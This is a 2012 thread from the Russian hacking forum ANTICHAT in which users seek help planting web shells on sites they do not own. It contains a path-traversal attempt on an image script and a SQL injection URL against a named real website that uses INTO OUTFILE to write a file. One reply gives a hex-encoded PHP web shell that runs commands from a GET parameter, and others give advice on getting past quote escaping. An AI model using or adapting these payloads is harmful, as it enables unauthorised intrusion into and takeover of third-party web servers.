ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.03.2012, 14:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от nikaw87
nikaw87 said:
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.
OxoTnik,
я не думаю, что картинки инклудят.
|
|
|
|
28.03.2012, 14:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
1172
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
Заливал... также тянул-просто черное изображение( жаль...
|
|
|
|
28.03.2012, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
1172
Репутация:
0
|
|
Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
|
|
|
|
28.03.2012, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
|
|
|
|
28.03.2012, 18:48
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Facecontrol
Facecontrol said:
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin
PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
|
|
|
28.03.2012, 20:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
попробуй перевести в HEX
получится так
Код:
Code:
0x3c3f2073797374656d28245f4745545b636d645d293b203f3e
хотя не получится |
|
|
|
28.03.2012, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
|
|
|
|
28.03.2012, 21:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
здесь экстрасенсов нету,сылку в студию
|
|
|
|
28.03.2012, 21:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
А можно ли через файл.css залить шелл?
|
|
|
|
28.03.2012, 21:17
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от Facecontrol
Facecontrol said:
А можно ли через файл.css залить шелл?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
